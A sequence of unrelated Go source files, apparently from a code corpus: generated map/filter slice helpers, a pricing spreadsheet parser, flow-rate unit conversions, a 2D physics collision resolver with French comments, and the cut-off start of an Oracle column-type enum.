if f == nil {
continue
}
tmpSlice = RemoveStrPtr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice stringSlice) DropWhile(functors ...stringFunctorForFilter) stringSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileStr(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice stringSlicePtr) DropWhilePtr(functors ...stringFunctorForFilterPtr) stringSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileStrPtr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice stringSlice) Reverse() stringSlice {
return ReverseStrs(slice)
}
// ReversePtr - reverse the list
func (slice stringSlicePtr) ReversePtr() stringSlicePtr {
return ReverseStrsPtr(slice)
}
// Distinct - removes duplicates
func (slice stringSlice) Distinct() stringSlice {
return DistinctStr(slice)
}
// DistinctPtr - removes duplicates
func (slice stringSlicePtr) DistinctPtr() stringSlicePtr {
return DistinctStrPtr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice stringSlice) TakeWhile(functors ...stringFunctorForFilter) stringSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileStr(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice stringSlicePtr) TakeWhilePtr(functors ...stringFunctorForFilterPtr) stringSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileStrPtr(f, tmpSlice)
}
return tmpSlice
}
type boolSlice []bool
type boolFunctorForMap func(bool) bool
type boolFunctorForFilter func(bool) bool
type boolSlicePtr []*bool
type boolFunctorForMapPtr func(*bool) *bool
type boolFunctorForFilterPtr func(*bool) bool
// MakeBoolSlice - creates slice for the functional method such as map, filter
func MakeBoolSlice(values ...bool) boolSlice {
newSlice := boolSlice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice boolSlice) Map(functors ...boolFunctorForMap) boolSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapBool(f, tmpSlice)
}
return tmpSlice
}
// MakeBoolSlicePtr - creates slice for the functional method such as map, filter
func MakeBoolSlicePtr(values ...*bool) boolSlicePtr {
newSlice := boolSlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice boolSlicePtr) MapPtr(functors ...boolFunctorForMapPtr) boolSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapBoolPtr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice boolSlice) Filter(functors ...boolFunctorForFilter) boolSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterBool(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice boolSlicePtr) FilterPtr(functors ...boolFunctorForFilterPtr) boolSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterBoolPtr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice boolSlice) Remove(functors ...boolFunctorForFilter) boolSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveBool(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice boolSlicePtr) RemovePtr(functors ...boolFunctorForFilterPtr) boolSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveBoolPtr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice boolSlice) DropWhile(functors ...boolFunctorForFilter) boolSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileBool(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice boolSlicePtr) DropWhilePtr(functors ...boolFunctorForFilterPtr) boolSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileBoolPtr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice boolSlice) Reverse() boolSlice {
return ReverseBools(slice)
}
// ReversePtr - reverse the list
func (slice boolSlicePtr) ReversePtr() boolSlicePtr {
return ReverseBoolsPtr(slice)
}
// Distinct - removes duplicates
func (slice boolSlice) Distinct() boolSlice {
return DistinctBool(slice)
}
// DistinctPtr - removes duplicates
func (slice boolSlicePtr) DistinctPtr() boolSlicePtr {
return DistinctBoolPtr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice boolSlice) TakeWhile(functors ...boolFunctorForFilter) boolSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileBool(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice boolSlicePtr) TakeWhilePtr(functors ...boolFunctorForFilterPtr) boolSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileBoolPtr(f, tmpSlice)
}
return tmpSlice
}
type float32Slice []float32
type float32FunctorForMap func(float32) float32
type float32FunctorForFilter func(float32) bool
type float32SlicePtr []*float32
type float32FunctorForMapPtr func(*float32) *float32
type float32FunctorForFilterPtr func(*float32) bool
// MakeFloat32Slice - creates slice for the functional method such as map, filter
func MakeFloat32Slice(values ...float32) float32Slice {
newSlice := float32Slice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice float32Slice) Map(functors ...float32FunctorForMap) float32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapFloat32(f, tmpSlice)
}
return tmpSlice
}
// MakeFloat32SlicePtr - creates slice for the functional method such as map, filter
func MakeFloat32SlicePtr(values ...*float32) float32SlicePtr {
newSlice := float32SlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice float32SlicePtr) MapPtr(functors ...float32FunctorForMapPtr) float32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapFloat32Ptr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice float32Slice) Filter(functors ...float32FunctorForFilter) float32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterFloat32(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice float32SlicePtr) FilterPtr(functors ...float32FunctorForFilterPtr) float32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterFloat32Ptr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice float32Slice) Remove(functors ...float32FunctorForFilter) float32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveFloat32(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice float32SlicePtr) RemovePtr(functors ...float32FunctorForFilterPtr) float32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveFloat32Ptr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice float32Slice) DropWhile(functors ...float32FunctorForFilter) float32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileFloat32(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice float32SlicePtr) DropWhilePtr(functors ...float32FunctorForFilterPtr) float32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileFloat32Ptr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice float32Slice) Reverse() float32Slice {
return ReverseFloat32s(slice)
}
// ReversePtr - reverse the list
func (slice float32SlicePtr) ReversePtr() float32SlicePtr {
return ReverseFloat32sPtr(slice)
}
// Distinct - removes duplicates
func (slice float32Slice) Distinct() float32Slice {
return DistinctFloat32(slice)
}
// DistinctPtr - removes duplicates
func (slice float32SlicePtr) DistinctPtr() float32SlicePtr {
return DistinctFloat32Ptr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice float32Slice) TakeWhile(functors ...float32FunctorForFilter) float32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileFloat32(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice float32SlicePtr) TakeWhilePtr(functors ...float32FunctorForFilterPtr) float32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileFloat32Ptr(f, tmpSlice)
}
return tmpSlice
}
type float64Slice []float64
type float64FunctorForMap func(float64) float64
type float64FunctorForFilter func(float64) bool
type float64SlicePtr []*float64
type float64FunctorForMapPtr func(*float64) *float64
type float64FunctorForFilterPtr func(*float64) bool
// MakeFloat64Slice - creates slice for the functional method such as map, filter
func MakeFloat64Slice(values ...float64) float64Slice {
newSlice := float64Slice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice float64Slice) Map(functors ...float64FunctorForMap) float64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapFloat64(f, tmpSlice)
}
return tmpSlice
}
// MakeFloat64SlicePtr - creates slice for the functional method such as map, filter
func MakeFloat64SlicePtr(values ...*float64) float64SlicePtr {
newSlice := float64SlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice float64SlicePtr) MapPtr(functors ...float64FunctorForMapPtr) float64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapFloat64Ptr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice float64Slice) Filter(functors ...float64FunctorForFilter) float64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterFloat64(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice float64SlicePtr) FilterPtr(functors ...float64FunctorForFilterPtr) float64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterFloat64Ptr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice float64Slice) Remove(functors ...float64FunctorForFilter) float64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveFloat64(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice float64SlicePtr) RemovePtr(functors ...float64FunctorForFilterPtr) float64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveFloat64Ptr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice float64Slice) DropWhile(functors ...float64FunctorForFilter) float64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileFloat64(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice float64SlicePtr) DropWhilePtr(functors ...float64FunctorForFilterPtr) float64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileFloat64Ptr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice float64Slice) Reverse() float64Slice {
return ReverseFloat64s(slice)
}
// ReversePtr - reverse the list
func (slice float64SlicePtr) ReversePtr() float64SlicePtr {
return ReverseFloat64sPtr(slice)
}
// Distinct - removes duplicates
func (slice float64Slice) Distinct() float64Slice {
return DistinctFloat64(slice)
}
// DistinctPtr - removes duplicates
func (slice float64SlicePtr) DistinctPtr() float64SlicePtr {
return DistinctFloat64Ptr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice float64Slice) TakeWhile(functors ...float64FunctorForFilter) float64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileFloat64(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice float64SlicePtr) TakeWhilePtr(functors ...float64FunctorForFilterPtr) float64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileFloat64Ptr(f, tmpSlice)
}
return tmpSlice
} | fp/methodchain.go | 0.649023 | 0.488283 | methodchain.go | starcoder |
package pricing
import (
"fmt"
"github.com/transcom/mymove/pkg/models"
)
// parseNonStandardLocnPrices: parser for 3e) Non-Standard Loc'n Prices
var parseNonStandardLocnPrices processXlsxSheet = func(params ParamConfig, sheetIndex int, logger Logger) (interface{}, error) {
// XLSX Sheet consts
const xlsxDataSheetNum int = 14 // 3e) Non-Standard Loc'n Prices
const feeColIndexStart int = 7 // start at column 7 to get the rates
const feeRowIndexStart int = 10 // start at row 10 to get the rates (NSRA to NSRA)
const feeRowNToOIndexStart int = 243 // start at row 243 to get the NSRA to OCONUS rates
const feeRowOToNIndexStart int = 1031 // start at row 1031 to get the OCONUS to NSRA rates
const feeRowNToCIndexStart int = 1819 // start at row 1819 to get the NSRA to CONUS rates
const feeRowOCToNIndexStart int = 2622 // start at row 2622 to get the CONUS to NSRA rates
const originIDColumn int = 2
const originAreaColumn int = 3
const destinationIDColumn int = 4
const destinationAreaColumn int = 5
const moveType int = 6
if xlsxDataSheetNum != sheetIndex {
return nil, fmt.Errorf("parseNonStandardLocnPrices expected to process sheet %d, but received sheetIndex %d", xlsxDataSheetNum, sheetIndex)
}
prefixPrinter := newDebugPrefix("StageNonStandardLocnPrice")
var nonStandardLocationPrices []models.StageNonStandardLocnPrice
sheet := params.XlsxFile.Sheets[xlsxDataSheetNum]
moveTypeSections := []int{
feeRowIndexStart,
feeRowNToOIndexStart,
feeRowOToNIndexStart,
feeRowNToCIndexStart,
feeRowOCToNIndexStart,
}
for _, section := range moveTypeSections {
for rowIndex := section; rowIndex < sheet.MaxRow; rowIndex++ {
colIndex := feeColIndexStart
// All the rows are consecutive, if we get to a blank one we're done
if mustGetCell(sheet, rowIndex, colIndex) == "" {
break
}
// For each Rate Season
for _, r := range rateSeasons {
nonStandardLocationPrice := models.StageNonStandardLocnPrice{
OriginID: mustGetCell(sheet, rowIndex, originIDColumn),
OriginArea: mustGetCell(sheet, rowIndex, originAreaColumn),
DestinationID: mustGetCell(sheet, rowIndex, destinationIDColumn),
DestinationArea: mustGetCell(sheet, rowIndex, destinationAreaColumn),
MoveType: mustGetCell(sheet, rowIndex, moveType),
Season: r,
}
nonStandardLocationPrice.HHGPrice = mustGetCell(sheet, rowIndex, colIndex)
colIndex++
nonStandardLocationPrice.UBPrice = mustGetCell(sheet, rowIndex, colIndex)
prefixPrinter.Printf("%+v\n", nonStandardLocationPrice)
nonStandardLocationPrices = append(nonStandardLocationPrices, nonStandardLocationPrice)
colIndex += 2 // skip 1 column (empty column) before starting next Rate type
}
}
}
return nonStandardLocationPrices, nil
}
var verifyNonStandardLocnPrices verifyXlsxSheet = func(params ParamConfig, sheetIndex int) error {
const xlsxDataSheetNum = 14
const feeRowIndexStart int = 10 // this should match the same const in parse fn
const headerRowIndex int = feeRowIndexStart - 2
const originIDCol int = 2
const originAreaCol int = 3
const destinationIDCol int = 4
const destinationAreaCol int = 5
const moveTypeCol int = 6
const feeColIndexStart int = 7
if xlsxDataSheetNum != sheetIndex {
return fmt.Errorf("verifyNonStandardLocnPrices expected to process sheet %d, but received sheetIndex %d", xlsxDataSheetNum, sheetIndex)
}
repeatingHeaders := []string{
"HHGPrice(exceptSIT)(percwt)",
"UBPrice(exceptSIT)(percwt)",
}
sheet := params.XlsxFile.Sheets[xlsxDataSheetNum]
mergedHeaderRowIndex := headerRowIndex - 1 // merged cell uses lower bound
if err := verifyHeader(sheet, mergedHeaderRowIndex, originIDCol, "OriginID"); err != nil {
return fmt.Errorf("verifyNonStandardLocnPrices verification failure: %w", err)
}
if err := verifyHeader(sheet, mergedHeaderRowIndex, originAreaCol, "OriginArea"); err != nil {
return fmt.Errorf("verifyNonStandardLocnPrices verification failure: %w", err)
}
if err := verifyHeader(sheet, mergedHeaderRowIndex, destinationIDCol, "DestinationID"); err != nil {
return fmt.Errorf("verifyNonStandardLocnPrices verification failure: %w", err)
}
if err := verifyHeader(sheet, mergedHeaderRowIndex, destinationAreaCol, "DestinationArea"); err != nil {
return fmt.Errorf("verifyNonStandardLocnPrices verification failure: %w", err)
}
// note: Move Type row is not merged like the other non-price headers
if err := verifyHeader(sheet, headerRowIndex, moveTypeCol, "MoveType"); err != nil {
return fmt.Errorf("verifyNonStandardLocnPrices verification failure: %w", err)
}
colIndex := feeColIndexStart
for _, season := range rateSeasons {
for _, header := range repeatingHeaders {
// don't use verifyHeader fn here so that we can name the season
if header != removeWhiteSpace(mustGetCell(sheet, headerRowIndex, colIndex)) {
return fmt.Errorf("format error: Header for '%s' season '%s' is missing, got '%s' instead", season, header, removeWhiteSpace(mustGetCell(sheet, headerRowIndex, colIndex)))
}
colIndex++
}
colIndex++
}
return nil
} | pkg/parser/pricing/parse_nonstandard_location_prices.go | 0.502441 | 0.453625 | parse_nonstandard_location_prices.go | starcoder |
package unit
// Flow represents a SI unit of volume flow rate in cubic meters per second, m3/s
type Flow Unit
// ...
const (
// SI
CubicMeterPerSecond Flow = 1e0
LiterPerSecond = CubicMeterPerSecond * 1e-3
LiterPerMinute = LiterPerSecond * 1 / 60
LiterPerHour = LiterPerSecond * 1 / 3600
// Non-SI
CubicFootPerSecond = CubicMeterPerSecond * 0.028316846592
// US liquid
USLiquidGallonPerSecond = LiterPerSecond * 3.7854117839988
USLiquidGallonPerMinute = USLiquidGallonPerSecond * 1 / 60
USLiquidGallonPerHour = USLiquidGallonPerSecond * 1 / 3600
)
// FromCubicMetersPerSecond return the value to be converted
func FromCubicMetersPerSecond(val float64) Value {
return Value{val * float64(CubicMeterPerSecond), flow}
}
// toCubicMetersPerSecond return the converted value
func toCubicMetersPerSecond(value Value) (float64, error) {
if value.unit != flow {
return 0, ErrConversion
}
return Flow(value.val).CubicMetersPerSecond(), nil
}
// CubicMetersPerSecond returns the flow rate in m3/s
func (f Flow) CubicMetersPerSecond() float64 {
return float64(f)
}
// FromCubicFeetPerSecond return the value to be converted
func FromCubicFeetPerSecond(val float64) Value {
return Value{val * float64(CubicFootPerSecond), flow}
}
// toCubicFeetPerSecond return the converted value
func toCubicFeetPerSecond(value Value) (float64, error) {
if value.unit != flow {
return 0, ErrConversion
}
return Flow(value.val).CubicFeetPerSecond(), nil
}
// CubicFeetPerSecond returns the flow rate in ft3/s
func (f Flow) CubicFeetPerSecond() float64 {
return float64(f / CubicFootPerSecond)
}
// FromLitersPerSecond return the value to be converted
func FromLitersPerSecond(val float64) Value {
return Value{val * float64(LiterPerSecond), flow}
}
// toLitersPerSecond return the converted value
func toLitersPerSecond(value Value) (float64, error) {
if value.unit != flow {
return 0, ErrConversion
}
return Flow(value.val).LitersPerSecond(), nil
}
// LitersPerSecond returns the flow rate in l/s
func (f Flow) LitersPerSecond() float64 {
return float64(f / LiterPerSecond)
}
// FromLitersPerHour return the value to be converted
func FromLitersPerHour(val float64) Value {
return Value{val * float64(LiterPerHour), flow}
}
// toLitersPerHour return the converted value
func toLitersPerHour(value Value) (float64, error) {
if value.unit != flow {
return 0, ErrConversion
}
return Flow(value.val).LitersPerHour(), nil
}
// LitersPerHour returns the flow rate in l/h
func (f Flow) LitersPerHour() float64 {
return float64(f / LiterPerHour)
}
// FromLitersPerMinute return the value to be converted
func FromLitersPerMinute(val float64) Value {
return Value{val * float64(LiterPerMinute), flow}
}
// toLitersPerMinute return the converted value
func toLitersPerMinute(value Value) (float64, error) {
if value.unit != flow {
return 0, ErrConversion
}
return Flow(value.val).LitersPerMinute(), nil
}
// LitersPerMinute returns the flow rate in l/min
func (f Flow) LitersPerMinute() float64 {
return float64(f / LiterPerMinute)
}
// FromUSLiquidGallonsPerHour return the value to be converted
func FromUSLiquidGallonsPerHour(val float64) Value {
return Value{val * float64(USLiquidGallonPerHour), flow}
}
// toUSLiquidGallonsPerHour return the converted value
func toUSLiquidGallonsPerHour(value Value) (float64, error) {
if value.unit != flow {
return 0, ErrConversion
}
return Flow(value.val).USLiquidGallonsPerHour(), nil
}
// USLiquidGallonsPerHour returns the flow rate in gal/h
func (f Flow) USLiquidGallonsPerHour() float64 {
return float64(f / USLiquidGallonPerHour)
}
// FromUSLiquidGallonsPerMinute return the value to be converted
func FromUSLiquidGallonsPerMinute(val float64) Value {
return Value{val * float64(USLiquidGallonPerMinute), flow}
}
// toUSLiquidGallonsPerMinute return the converted value
func toUSLiquidGallonsPerMinute(value Value) (float64, error) {
if value.unit != flow {
return 0, ErrConversion
}
return Flow(value.val).USLiquidGallonsPerMinute(), nil
}
// USLiquidGallonsPerMinute returns the flow rate in gal/min
func (f Flow) USLiquidGallonsPerMinute() float64 {
return float64(f / USLiquidGallonPerMinute)
}
// FromUSLiquidGallonsPerSecond return the value to be converted
func FromUSLiquidGallonsPerSecond(val float64) Value {
return Value{val * float64(USLiquidGallonPerSecond), flow}
}
// toUSLiquidGallonsPerSecond return the converted value
func toUSLiquidGallonsPerSecond(value Value) (float64, error) {
if value.unit != flow {
return 0, ErrConversion
}
return Flow(value.val).USLiquidGallonsPerSecond(), nil
}
// USLiquidGallonsPerSecond returns the flow rate in gal/s
func (f Flow) USLiquidGallonsPerSecond() float64 {
return float64(f / USLiquidGallonPerSecond)
} | flow.go | 0.876264 | 0.400456 | flow.go | starcoder |
package physics
import (
"fmt"
)
const (
velocityTolerance float64 = 0.001
)
//CollisionInfo Informations sur une collision ou son absence
type CollisionInfo struct {
first Shape
second Shape
penetration float64
normal Vec2
resolved bool
}
//IsColliding retourne true s'il y a collision
func (i *CollisionInfo) IsColliding() bool {
return i.second != nil
}
//Resolved retourne true si collision déjà résolue
func (i *CollisionInfo) Resolved() bool {
return i.resolved
}
//SetResolved marque la collision comme résolue
func (i *CollisionInfo) SetResolved(b bool) {
i.resolved = b
}
//First retourne la première des deux formes impliquées dans la collision
func (i *CollisionInfo) First() Shape {
return i.first
}
//Second retourne la seconde des deux formes impliquées dans la collision
func (i *CollisionInfo) Second() Shape {
return i.second
}
//GetShapeForTag retourne les formes impliquées dans la collision
// qui possèdent ce tag
func (i *CollisionInfo) GetShapeForTag(t string) ([]Shape, error) {
shapes := []Shape{}
if stringListContains(i.first.Tags(), t) {
shapes = append(shapes, i.first)
}
if stringListContains(i.second.Tags(), t) {
shapes = append(shapes, i.second)
}
err := error(nil)
if len(shapes) == 0 {
err = fmt.Errorf("Pas de forme ayant le tag %v", t)
}
return shapes, err
}
//GetShapeForName retourne la forme qui a ce nom ou rien et une erreur
func (i *CollisionInfo) GetShapeForName(n string) (Shape, error) {
if i.first.Name() == n {
return i.first, nil
} else if i.second.Name() == n {
return i.second, nil
} else {
return nil, fmt.Errorf("Aucune des formes n'a ce nom: %v", n)
}
}
//String retourne une version imprimable
func (i *CollisionInfo) String() string {
return fmt.Sprintf("first: %v second: %v penetration: %v normal: %v",
i.first.Name(), i.second.Name(), i.penetration, i.normal)
}
//Resolv résoud la collision en déterminant la rectification de position
// et l'impulsion à donner aux objets
func (i *CollisionInfo) Resolv() {
// Ne résoud pas plusieurs fois
if i.resolved {
return
}
//Pas besoin de "séparer" les objets dès lors que la collision est
// résolue par l'application d'une impulsion
// i.Separate()
first := i.first
second := i.second
// Détermination de l'impulsion a appliquer aux objets sur la normale de la collision
// vitesse relative
f2S := second.Velocity().Sub(first.Velocity())
// vitesse relative sur la normale de la collision
vRelAlongNorm := f2S.DotProduct(i.normal)
// résoud pas si s'éloignent
if vRelAlongNorm > 0 {
return
}
e := Min(first.Elasticity(), second.Elasticity())
// calcule impulsion scalaire
j := -(1 + e) * vRelAlongNorm
j /= first.InvMass() + second.InvMass()
impulse := i.normal.Mult(j)
// appliquer l'impulsion
first.SetVelocity(first.Velocity().Sub(impulse.Mult(first.InvMass())))
second.SetVelocity(second.Velocity().Add(impulse.Mult(second.InvMass())))
//Applique friction
first.SetVelocity(first.Velocity().Mult(1 - first.Friction()))
second.SetVelocity(second.Velocity().Mult(1 - second.Friction()))
// Correction naufrage ("sinking"), "causé par le fait que "la résultante des vitesses
// est insuffisante pour pousser l'objet hors d'une collision, quand un objet est stationnaire"
percent := 0.5 // habituellement 20% à 80%
corr := i.normal.Mult(i.penetration / (first.InvMass() + second.InvMass()) * percent)
first.SetPos(first.Pos().Sub(corr.Mult(first.InvMass())))
second.SetPos(second.Pos().Add(corr.Mult(second.InvMass())))
//met resolved à true, pour ne pas pouvoir résoudre deux fois la même collision
i.SetResolved(true)
}
//Separate sépare deux objets en revenant à une position pré-collision
func (i *CollisionInfo) Separate() {
// Ne résoud pas plusieurs fois
if i.resolved {
return
}
first := i.first
second := i.second
// Repositionnement des objets qui s'interpénètrent
totInvMass := first.InvMass() + second.InvMass()
first.SetPos(first.Pos().Sub(i.normal.Mult(i.penetration * first.InvMass() / totInvMass)))
second.SetPos(second.Pos().Add(i.normal.Mult(i.penetration * second.InvMass() / totInvMass)))
//met resolved à true, pour ne jamais pouvoir résoudre deux fois la même collision
i.SetResolved(true)
}
//AABBvsAABB Détermine l'ajustement des coordonées de first et second si entrent en collision
// retourne une réponse qui contient la pénétration et la normale de la face
// sur laquelle il y a collision
func AABBvsAABB(first *Rectangle, second *Rectangle) *CollisionInfo {
info := &CollisionInfo{}
info.first = first
if first.getMax().X < second.Pos().X || first.Pos().X > second.getMax().X {
return info
}
if first.getMax().Y < second.Pos().Y || first.Pos().Y > second.getMax().Y {
return info
}
// il y a collision
info.second = second
// différence entre distance de centre à centre et sommes des demi-côtés, sur les deux axes
// donne la profondeur de pénétration d'une forme dans l'autre
distance := second.Center().Sub(first.Center())
px := (first.Width()+second.Width())/2 - Abs(distance.X)
py := (first.Height()+second.Height())/2 - Abs(distance.Y)
// choix de l'axe de moindre pénétration
if px < py {
sx := Sign(distance.X)
info.normal.X = sx
info.penetration = px
} else {
sy := Sign(distance.Y)
info.normal.Y = sy
info.penetration = py
}
// grounded si normale.Y == -1 et corps a une masse
if info.normal.Y == -1 {
if first.mass != 0 {
first.SetGrounded(true)
}
if second.mass != 0 {
second.SetGrounded(true)
}
}
return info
}
//CirclevsCircle génère CollisionInfo pour collisions de cercles
func CirclevsCircle(first *Circle, second *Circle) *CollisionInfo {
info := &CollisionInfo{}
info.first = first
firstCenter, secCenter := first.Center(), second.Center()
FirstSec := secCenter.Sub(firstCenter)
dist := FirstSec.Length()
radSum := first.radius + second.radius
// La distance entre le deux centres est plus grande que la somme des rayons
if dist >= radSum {
return info
}
// il y a collision
info.second = second
if dist != 0 {
info.penetration = radSum - dist
info.normal = FirstSec.Div(dist) // dist déjà calculée
} else { // les deux cercles on même centre
info.penetration = first.radius
info.normal = Vec2{1, 0}
}
//TODO: c'est quoi ça?
// grounded si normale.Y == -1 et corps a une masse
if info.normal.Y == -1 {
if first.mass != 0 {
first.SetGrounded(true)
}
if second.mass != 0 {
second.SetGrounded(true)
}
}
return info
}
//AABBvsCircle génère CollisionInfo pour collisions rectangle/cercle
// Copié de https://gamedevelopment.tutsplus.com/tutorials/how-to-create-a-custom-2d-physics-engine-the-basics-and-impulse-resolution--gamedev-6331
func AABBvsCircle(first *Rectangle, second *Circle) *CollisionInfo {
info := &CollisionInfo{}
info.first = first
n := second.Center().Sub(first.Center())
closest := n
xExtent := first.Width() / 2
yExtent := first.Height() / 2
closest.X = Clamp(closest.X, -xExtent, xExtent)
closest.Y = Clamp(closest.Y, -yExtent, yExtent)
closest = first.Center().Add(closest)
inside := false
// Cercle est dans AABB
if n == closest {
inside = true
// Axe le plus proche
if Abs(n.X) > Abs(n.X) {
if closest.X > 0 {
closest.X = xExtent
} else {
closest.X = -xExtent
}
} else {
if closest.Y > 0 {
closest.Y = yExtent
} else {
closest.Y = -yExtent
}
}
}
dist := second.Center().Distance(closest)
if dist > second.Radius() && !inside {
return info
}
info.second = second
normale := second.Center().Sub(closest).Normalize()
if inside {
info.normal = normale.Neg()
} else {
info.normal = normale
}
info.penetration = second.Radius() - dist
// grounded si normale.Y == -1 et corps a une masse
if info.normal.Y == -1 {
if first.mass != 0 {
first.SetGrounded(true)
}
if second.mass != 0 {
second.SetGrounded(true)
}
}
return info
} | collision.go | 0.581778 | 0.596551 | collision.go | starcoder |
package ora
// GoColumnType defines the Go type returned from a sql select column.
type GoColumnType uint
// go column types
const (
// D defines a sql select column based on its default mapping.
D GoColumnType = iota + 1
// I64 defines a sql select column as a Go int64.
I64
// I32 defines a sql select column as a Go int32.
I32
// I16 defines a sql select column as a Go int16.
I16
// I8 defines a sql select column as a Go int8.
I8
// U64 defines a sql select column as a Go uint64.
U64
// U32 defines a sql select column as a Go uint32.
U32
// U16 defines a sql select column as a Go uint16.
U16
// U8 defines a sql select column as a Go uint8.
U8
// F64 defines a sql select column as a Go float64.
F64
// F32 defines a sql select column as a Go float32.
F32
// OraI64 defines a sql select column as a nullable Go ora.Int64.
OraI64
